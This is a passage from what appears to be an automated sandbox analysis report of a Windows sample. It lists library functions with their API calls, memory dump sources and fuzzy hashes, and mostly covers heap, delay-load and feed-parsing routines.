                                                                                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 006035F8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00603609,00000000,?,00000000), ref: 00603069
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,005EC025,?,005C5405,?,00000000,?), ref: 00603075
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 52713655-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: ab503686dd8e9f1551abc4f36d838a8a407fc0f8e49dd7a681e98ab22c8ecd39
                                                                                                                                                                                                                                                                                                  • Instruction ID: acc58611186c06cd0476e122d1200db2a4ab900c6674147f27652b4e8b573756
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab503686dd8e9f1551abc4f36d838a8a407fc0f8e49dd7a681e98ab22c8ecd39
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7316D76E10229ABCB14DFA8C884ADFB7F9EF08711F01456AED05AB341D7719D008BA0
                                                                                                                                                                                                                                                                                                  Function 005F521A Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,005F1F87,?,0000015D,?,?,?,?,005F33E0,000000FF,00000000,?,?), ref: 005F524C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 36e779f493665bfa57084ebcfa200d2fc2a9a5671c91fca0e0a623ce3ac91f8b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1bb063d89078af1c9c590a76a9d2e631adbb1317068686c9394de33280e4cf43
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36e779f493665bfa57084ebcfa200d2fc2a9a5671c91fca0e0a623ce3ac91f8b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BE02B3954096D5AEB3127659C09B7B3F4DBFD13A0F251310AF10A6091EB6CDD4045E1
                                                                                                                                                                                                                                                                                                  Function 005C34B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,005D8BD3,0000001C,80070490,00000000,00000000,80070490), ref: 005C34D5
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FolderPath
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1514166925-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a4f0ad5fdc835878f3f4111e103a77ddd651e9e21760ca891b670c4acfb40621
                                                                                                                                                                                                                                                                                                  • Instruction ID: 374e6799f613f348f66acc44a754224ced7bc71a24c6345a34515fb8b9489bbc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4f0ad5fdc835878f3f4111e103a77ddd651e9e21760ca891b670c4acfb40621
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89E012722012297FEB062EE15C09EAB7F5CBF45354B00C059FE40D6111D766E95097B5
                                                                                                                                                                                                                                                                                                  Function 005FF479 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 005FF491
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00609A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00609A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 01855b312ee048b87cc9501387344216d9897952749f5277cb8f8426d2c657c8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1b5775937aa8ce3700147d08644a7174a3bc99d822a6fe0dbc313a2025916f31
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01855b312ee048b87cc9501387344216d9897952749f5277cb8f8426d2c657c8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3B012B52BBC11BD764C15513C06C37050FC6C1F22331C66EB440C1081A8C00D408472
                                                                                                                                                                                                                                                                                                  Function 005FF49A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 005FF491
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00609A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00609A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: c2c61f3a43d9b78d0ae7d7bd535ce6a722dab858d651a99c983921f4f52f0adc
                                                                                                                                                                                                                                                                                                  • Instruction ID: d474ab98f04f4a8bf7c33dd44bda860c6ba42b41f0f750cfcc2e839b747bd4e0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2c61f3a43d9b78d0ae7d7bd535ce6a722dab858d651a99c983921f4f52f0adc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90B012B12BBC11AE768C55553D07C37050FC6C6F22331856EB040C2081E8C40D414532
                                                                                                                                                                                                                                                                                                  Function 005FF4AA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 005FF491
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00609A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00609A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: dca3663d55d3974249ca039533ba08f7fc7aea860b8b7d1ea59332dedbe9a8c0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6a77a3520d6b60d18933a4482e257a7b5e5d8de27f45efba4e73105db5026471
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dca3663d55d3974249ca039533ba08f7fc7aea860b8b7d1ea59332dedbe9a8c0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4B012B12BBD11AD768C56553C06C37050FC6C5F22331C66EF040C2081E8C00D804532
                                                                                                                                                                                                                                                                                                  Function 00609674 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0060966B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00609A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00609A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: b46b624d2c8cba9fcaff920a8335dc959ac4655733e4e89e72bb92b525867b86
                                                                                                                                                                                                                                                                                                  • Instruction ID: 38a6c2a2e38d4fff17a051890e66c293e8d677d61885370385a1cbb4ca51598b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b46b624d2c8cba9fcaff920a8335dc959ac4655733e4e89e72bb92b525867b86
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77B012A12FA812ADB68C51453C03C37070FC6C0B12331C11EB400C21C2E8C00C458532
                                                                                                                                                                                                                                                                                                  Function 00609653 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0060966B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00609A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00609A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0b647d715b31f18872dc0f55384eb9dc69f5e843036845d68a682b73552fb319
                                                                                                                                                                                                                                                                                                  • Instruction ID: d3a9d5faee44d667d6a2f76ff77c750b7409473dbdf312cfbba46fb36a2668a0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b647d715b31f18872dc0f55384eb9dc69f5e843036845d68a682b73552fb319
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9B012A12FA912BDBA4C11417C82C37060FCAC0F11331C11EB000E11C2A8C00D414677
                                                                                                                                                                                                                                                                                                  Function 00609684 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0060966B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00609A09
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0060998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00609A1A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 67025a4a171424738d4e7d5e2b3999b2753743f2183699ee82616d82d940f743
                                                                                                                                                                                                                                                                                                  • Instruction ID: a1201864324438b85a457e3df2616b28d775d844b70f68ee7ebb527106ffc8e0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67025a4a171424738d4e7d5e2b3999b2753743f2183699ee82616d82d940f743
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7B012A12FAA12ADBA8C51853E43C37060FCAC1F11331811EB000D22C2E8C10C424572
                                                                                                                                                                                                                                                                                                  Function 005C1361 Relevance: 1.3, APIs: 1, Instructions: 88stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,005C21CC,000001C7,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3BDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005C3BD3: HeapSize.KERNEL32(00000000,?,005C21CC,000001C7,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3BE2
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(000001C7,000001C7,80004005,00000000,?,cabextract.cpp,000001C7), ref: 005C139C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$ProcessSizelstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3492610842-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: cdcc685f2e56a50bfbbcbc43391e4be0bda1edb61b1a8d176d407e816e2bf560
                                                                                                                                                                                                                                                                                                  • Instruction ID: a2306de3162c08c29cb528d78705a58b4100e2794598295640a1279831408491
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cdcc685f2e56a50bfbbcbc43391e4be0bda1edb61b1a8d176d407e816e2bf560
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1521D236D00919AFCF168FE8C880FADBFA5BF86360F55815CEC50AB252C7349D119B88

                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                  Function 0060710D Relevance: 45.8, APIs: 11, Strings: 15, Instructions: 298COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,00623E78,000000FF,?,?,?), ref: 006071D4
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 006071F9
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 00607219
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 00607235
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 0060725D
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00607279
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 006072B2
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 006072EB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00606D50: SysFreeString.OLEAUT32(00000000), ref: 00606E89
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00606D50: SysFreeString.OLEAUT32(00000000), ref: 00606EC8
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0060736F
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0060741F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Compare$Free
                                                                                                                                                                                                                                                                                                  • String ID: ($atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 318886736-4294603148
                                                                                                                                                                                                                                                                                                  • Opcode ID: 087844c339cc0de160f07ac89c4b4ddb8ed423733f3329513079e900442b7694
                                                                                                                                                                                                                                                                                                  • Instruction ID: 397ae367e00ca9b0985f39d66b8979f5b14544ce4d1235d2fd69b08c5a19c94a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 087844c339cc0de160f07ac89c4b4ddb8ed423733f3329513079e900442b7694
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEA19F31D88226FBDB299B94CC41FAF7B66AB04720F214355F920A62D1DB70FE10DB90
                                                                                                                                                                                                                                                                                                  Function 00608134 Relevance: 31.8, APIs: 9, Strings: 9, Instructions: 309COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 00608161
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 0060817C
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 0060821F
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,0060B518,00000000), ref: 0060825E
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 006082B1
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,0060B518,000000FF,true,000000FF), ref: 006082CF
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 00608307
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 0060844B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
